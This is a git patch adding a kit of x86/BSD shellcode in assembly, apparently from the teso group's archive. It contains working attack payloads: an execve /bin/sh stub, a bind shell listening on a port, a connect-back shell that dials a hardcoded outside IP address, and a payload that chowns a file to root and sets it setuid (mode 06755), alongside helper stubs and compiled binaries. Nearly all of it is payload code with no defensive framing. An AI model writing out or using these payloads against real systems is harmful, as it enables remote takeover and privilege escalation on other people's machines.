From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- other/shellkit/x86_bsd/FIXME_chmod.s | 43 +++++++++++++++++++++++++ other/shellkit/x86_bsd/bindshell.s | 59 +++++++++++++++++++++++++++++++++++ other/shellkit/x86_bsd/connectsh | Bin 0 -> 6100 bytes other/shellkit/x86_bsd/connectsh.s | 51 ++++++++++++++++++++++++++++++ other/shellkit/x86_bsd/execvesh | Bin 0 -> 6034 bytes other/shellkit/x86_bsd/execvesh.s | 31 ++++++++++++++++++ other/shellkit/x86_bsd/exit.s | 18 +++++++++++ other/shellkit/x86_bsd/spset.s | 36 +++++++++++++++++++++ 8 files changed, 238 insertions(+) create mode 100644 other/shellkit/x86_bsd/FIXME_chmod.s create mode 100644 other/shellkit/x86_bsd/bindshell.s create mode 100644 other/shellkit/x86_bsd/connectsh create mode 100644 other/shellkit/x86_bsd/connectsh.s create mode 100644 other/shellkit/x86_bsd/execvesh create mode 100644 other/shellkit/x86_bsd/execvesh.s create mode 100644 other/shellkit/x86_bsd/exit.s create mode 100644 other/shellkit/x86_bsd/spset.s (limited to 'other/shellkit/x86_bsd') diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s new file mode 100644 index 0000000..6f19d23 --- /dev/null +++ b/other/shellkit/x86_bsd/FIXME_chmod.s @@ -0,0 +1,43 @@ +/* x86/BSD PIC local chmod code + * + * by stealth + */ + + .globl cbegin + .globl cend + +cbegin: + jmp boomsh + +foo: popl %ebx + incl (%ebx) + incl 4(%ebx) + + xorl %eax, %eax + movb %al, 11(%ebx) + + movb $16, %al /* chown */ + xorl %ecx, %ecx + pushl %ecx + pushl %ecx + pushl %ebx + pushl $1 +sys_1: int $0x80 + + xorl %eax, %eax /* chmod */ + movb $15, %al + pushw $06755 + pushl %ebx + pushl $1 +sys_2: int $0x80 + + xorl %eax, %eax + incl %eax /* exit */ + pushl $1 +sys_3: int $0x80 + +boomsh: call foo + .string ".tmp.boomsh."; +cend: + + diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s new file mode 100644 index 0000000..8921fa9 --- /dev/null +++ b/other/shellkit/x86_bsd/bindshell.s @@ -0,0 +1,59 @@ +/* x86/BSD bindsh shellcode (73 bytes) + + lorian / teso +*/ + + .globl _cbegin + .globl cbegin + .globl _cend + .globl cend + +_cbegin: +cbegin: + xorl %ebx, %ebx + mull %ebx + pushl %ebx + incl %ebx + pushl %ebx + incl %ebx + pushl %ebx + movb $0x61, %al + pushl %ebx + int $0x80 + xchgl %esi, %eax + pushl %edx + pushw $0x4444 + pushw %bx + movl %esp, %ebp + pushl $0x10 + pushl %ebp + pushl %esi + pushl %esi + pushl $0x68 + popl %eax + int $0x80 + movb $0x6a, %al + int $0x80 + pusha + movb $0x1e, %al + int $0x80 +a: + pushl %ebx + pushl %eax + pushl %eax + movb $0x5a, %al + int $0x80 + decl %ebx + jns a + pushl %edx + movl %esp, %ebx + push $0x68732F6E + push $0x69622F2F + pusha + popl %esi + popl %esi + movb $0x3b, %al + int $0x80 + +_cend: +cend: diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh new file mode 100644 index 0000000..f9aaab7 Binary files /dev/null and b/other/shellkit/x86_bsd/connectsh differ diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s new file mode 100644 index 0000000..562f5ef --- /dev/null +++ b/other/shellkit/x86_bsd/connectsh.s @@ -0,0 +1,51 @@ +/* x86/BSD connectsh shellcode (66 bytes) + + lorian / teso +*/ + + .globl _cbegin + .globl cbegin + .globl _cend + .globl cend + +_cbegin: +cbegin: + xorl %ebp, %ebp + mull %ebp + pushl %ebp + incl %ebp + pushl %ebp + incl %ebp + pushl %ebp + movb $0x61, %al + pushl %ebp + int $0x80 + xchgl %esi, %eax + pushl $0xcab058c3 + pushw $0x4444 + pushw %bp + movl %esp, %edi + pushl $0x10 + pushl %edi + pushl %esi + pushl %esi + pushl $0x62 + popl %eax + int $0x80 +a: pusha + movb $0x5a, %al + int $0x80 + decl %ebp + jns a + pushl %edx + movl %esp, %ebx + push $0x68732F6E + push $0x69622F2F + pusha + popl %esi + popl %esi + movb $0x3b, %al + int $0x80 + +_cend: +cend: diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh new file mode 100644 index 0000000..7518768 Binary files /dev/null and b/other/shellkit/x86_bsd/execvesh differ diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s new file mode 100644 index 0000000..370e7a4 --- /dev/null +++ b/other/shellkit/x86_bsd/execvesh.s @@ -0,0 +1,31 @@ +/* x86/BSD execve /bin/sh shellcode + * + * lorian / teso + */ + +/* somehow the obsd on plan9 where i tested it, needs the labels + * exported with _ before, while freebsd doesnt + */ + +/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */ + + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +_cbegin: +cbegin: + pushl $0x3b + popl %eax + cdq + pushl %edx + movl %esp, %ebx + push $0x68732F6E + push $0x69622F2F + pusha /* FULLPOWER */ + pop %esi + pop %esi + int $0x80 +_cend: +cend: diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s new file mode 100644 index 0000000..7993035 --- /dev/null +++ b/other/shellkit/x86_bsd/exit.s @@ -0,0 +1,18 @@ +/* x86/BSD exit shellcode + * + * lorian / teso + */ + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +_cbegin: +cbegin: + + xorl %eax, %eax + incl %eax + int $0x80 + +_cend: +cend: diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s new file mode 100644 index 0000000..9bc19f4 --- /dev/null +++ b/other/shellkit/x86_bsd/spset.s @@ -0,0 +1,36 @@ +/* x86 spset shellcode + * + * lorian / teso + */ + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +/* searches for 512 bytes "free" space on stack without destroying it + * like any kind of call would do... + * + * NOTE: your real shellcode must be terminated with + * \x78\x56\x34\x12 for this code to work... + */ + +_cbegin: +cbegin: + + movl $0x12345678, %eax +a: + cdq + movb $0x02, %dh +b: + popl %ebx + pushl %ebx + incl %esp + decl %edx + jz c + cmpl %eax, %ebx + je a + jmp b +c: + +_cend: +cend: -- cgit v1.3